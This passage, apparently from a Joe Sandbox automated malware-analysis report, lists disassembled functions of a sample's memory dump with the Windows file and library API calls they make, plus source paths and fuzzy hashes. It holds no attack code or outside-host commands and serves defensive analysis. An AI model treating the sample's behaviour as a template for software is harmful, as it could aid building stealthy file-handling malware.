                                                          • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                                          • Part of subcall function 0040498D: CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$ApisFileH_prolog
                                                        • String ID:
                                                        • API String ID: 1021588753-0
                                                        • Opcode ID: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                                                        • Instruction ID: 2f64d7a75cdf7ff6db5ed191fdbb19fa086d8aebc57dacf92a4c812467fb8a6f
                                                        • Opcode Fuzzy Hash: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                                                        • Instruction Fuzzy Hash: 18E0DFA0B002002BCB147B79AC0679E376D4B80218F10867EA652671E1EA7999449608
                                                        APIs
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,00000003,?,?,00000000,004050FF,?,?,?,00405160,?,?,?,00000003), ref: 004050CE
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: FileNameTemp
                                                        • String ID:
                                                        • API String ID: 745986568-0
                                                        • Opcode ID: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                                                        • Instruction ID: d5c13e583cf4c34c7a3a11816bb62f42e40da82da4d3cfe63a6d47b8b5213b5b
                                                        • Opcode Fuzzy Hash: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                                                        • Instruction Fuzzy Hash: 91E086723016106BD71056699C45A4BA7DEDFD8752F15843FB545E3381D6B48C004A78
                                                        APIs
                                                        • SysAllocString.OLEAUT32(?), ref: 00405D71
                                                          • Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: AllocExceptionRaiseString
                                                        • String ID:
                                                        • API String ID: 1415472724-0
                                                        • Opcode ID: 313272d88e3834385c103984260c6c8c9ca4a4ab5fd4d804f695adf0373ca9e7
                                                        • Instruction ID: d0734d5c7e5939215d37afae748a6b456316f2180b0855a0f59ce99ff0d6cfc1
                                                        • Opcode Fuzzy Hash: 313272d88e3834385c103984260c6c8c9ca4a4ab5fd4d804f695adf0373ca9e7
                                                        • Instruction Fuzzy Hash: C0E0E572640704A6C7209F65D8559877BE8EF00385B10C43FF548D6150E779E5508BD8
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 004058D2
                                                          • Part of subcall function 00405806: __EH_prolog.LIBCMT ref: 0040580B
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                                                        • Instruction ID: 5bfd618a99589873673dbdde5608ad138896477ef474a485a6b18cf586c7d2b5
                                                        • Opcode Fuzzy Hash: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                                                        • Instruction Fuzzy Hash: E7E01A72D410049ACB05BB95E9526EDB778EF51319F10403BA412725919B785E18CA58
                                                        APIs
                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00405CAA
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                                                        • Instruction ID: 646c0e8b7f70081892c45aa98fa77e415187d9694f298a279afc83584de54578
                                                        • Opcode Fuzzy Hash: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                                                        • Instruction Fuzzy Hash: F8E0E575600208FFCB11CF95C801B8E7BF9EB09364F20C069F914AA260D339EA50DF54
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00405846
                                                          • Part of subcall function 004055DE: __EH_prolog.LIBCMT ref: 004055E3
                                                          • Part of subcall function 004055DE: FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                                          • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: FindH_prolog$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2004497850-0
                                                        • Opcode ID: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                                                        • Instruction ID: b7fde63f1f0c292b4e5d00ec8c3d5d27a79480d2707f186765d0e2b5b752fd38
                                                        • Opcode Fuzzy Hash: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                                                        • Instruction Fuzzy Hash: 7CE04FB1951506ABCB14DF50CC52AEEB734FB1131CF10421EE021722D08B785648CA28
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040580B
                                                          • Part of subcall function 0040553A: FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                                          • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirstH_prolog
                                                        • String ID:
                                                        • API String ID: 889498515-0
                                                        • Opcode ID: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                                                        • Instruction ID: 15a52a3ac40e1f9f01e416ae3406c700f8aec04b6379e90cb97043f6baa550c5
                                                        • Opcode Fuzzy Hash: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                                                        • Instruction Fuzzy Hash: 2AE01AB195150AAACB04DB50CC52AEEB760EB1131CF00421AA421722D0877856488A28
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040F8C8
                                                          • Part of subcall function 0040F648: __EH_prolog.LIBCMT ref: 0040F64D
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                                                        • Instruction ID: 6b40bdca6a02cd8c303c1b1c800ac92429027f894e9b325ac65d5e69f4ab0667
                                                        • Opcode Fuzzy Hash: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                                                        • Instruction Fuzzy Hash: 0CD01272911104EBD711AB49D842BDEBB68EB8135DF10853BF00171550C37D56459569
                                                        APIs
                                                        • ReadFile.KERNELBASE(000000FF,00000000,?,?,00000000,000000FF,?,00405BC6,00000000,?,00000000,?,00405BEC,00000000,?,00000000), ref: 00405B91
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                                                        • Instruction ID: c5e24743f6b433bb21cc94cc2971fe47eb8403274bd7f90fdb54931116458873
                                                        • Opcode Fuzzy Hash: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                                                        • Instruction Fuzzy Hash: 7EE0EC75241208FBCB01CF90CD01FCE7BB9EB49754F208058E90596160D375AA14EB54
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0040FD14
                                                          • Part of subcall function 0040CAA2: __EH_prolog.LIBCMT ref: 0040CAA7
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: dbd4b9ed641e9152439da66c4e0b290fb7d266938089cc33f664c0651390565b
                                                        • Instruction ID: 7c98d5485e7b61f989c29cfbefb74aac38a8df8cf277041967c76c7f99e82b19
                                                        • Opcode Fuzzy Hash: dbd4b9ed641e9152439da66c4e0b290fb7d266938089cc33f664c0651390565b
                                                        • Instruction Fuzzy Hash: E9D05EB1B101459BCB58EFB984427ADB7A0AF84308F00853FA016F27C0EB7C4A408A19
                                                        APIs
                                                        • FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CloseFind
                                                        • String ID:
                                                        • API String ID: 1863332320-0
                                                        • Opcode ID: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                                                        • Instruction ID: 986561ebb0227da743eeb2b9ec995cdcc659c9848a972ac8d271436d9e92df52
                                                        • Opcode Fuzzy Hash: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                                                        • Instruction Fuzzy Hash: 6BD0123150452166CF745E3C7C459C333D99A123B03660BAAF4B4D32E5D3748CC35AD4
                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00405A2C,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A6E
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                                                        • Instruction ID: 8a38a6d9813b312501c47e0c29c9a2f8cf12ac5fa7676fc4773f80372e0f1af5
                                                        • Opcode Fuzzy Hash: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                                                        • Instruction Fuzzy Hash: 5CD0C93160462146CA645E3C7C849D737D89A16330325176AF0B5D22E4D3748D875E94
                                                        APIs
                                                          • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                                        • DeleteFileA.KERNELBASE(?,?,00404DBF,?,00000000,?,?,?,?,?,00000000), ref: 00404BED
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesDelete
                                                        • String ID:
                                                        • API String ID: 2910425767-0
                                                        • Opcode ID: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                                                        • Instruction ID: 9a45e8f854b003a178289988cc7fc064ae5902da4cc88310474d582750e90668
                                                        • Opcode Fuzzy Hash: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                                                        • Instruction Fuzzy Hash: 0BC08C26209231439A043ABA3805ACB171E0EC122030AC0BBB800A2059CB288DC221DC
                                                        APIs
                                                        • SetFileTime.KERNELBASE(?,?,?,?,00405C84,00000000,00000000,?,00402E12,?), ref: 00405C68
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: FileTime
                                                        • String ID:
                                                        • API String ID: 1425588814-0
                                                        • Opcode ID: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                                                        • Instruction ID: 87fe90df0bd66b56430cb58ce5188ab21e49bedd0782b4bf3c7b48ca6ef22eff
                                                        • Opcode Fuzzy Hash: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                                                        • Instruction Fuzzy Hash: 8EC04C36158105FF8F020F70CC04C5EBFA2EB99711F10C918B269C40B0C7328024EB02
                                                        APIs
                                                        • SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                                                        • Instruction ID: c0231da6564a4fbd22ddd4f059f5cfeb57e5ba4ab4dd36146b68eeddd1056acd
                                                        • Opcode Fuzzy Hash: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                                                        • Instruction Fuzzy Hash: 5BA002A03112059BA6145B315E0AB6F296DEDC9AE1705C56C7412C5060EB29C9505565
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory
                                                        • String ID:
                                                        • API String ID: 4241100979-0
                                                        • Opcode ID: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                                                        • Instruction ID: 18df801fa9cda183c38834b8287032c54ef98b8f5de1dc60049a64e9909c76fe
                                                        • Opcode Fuzzy Hash: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                                                        • Instruction Fuzzy Hash: DCA0223030030283E2200F320E0AB0F280CAF08AC0F00C02C3000C80E0FB28C000008C
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0041795A,?,Microsoft Visual C++ Runtime Library,00012010,?,0041BD2C,?,0041BD7C,?,?,?,Runtime Error!Program: ), ref: 00418332
                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041834A
                                                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041835B
                                                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00418368
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                        • API String ID: 2238633743-4044615076
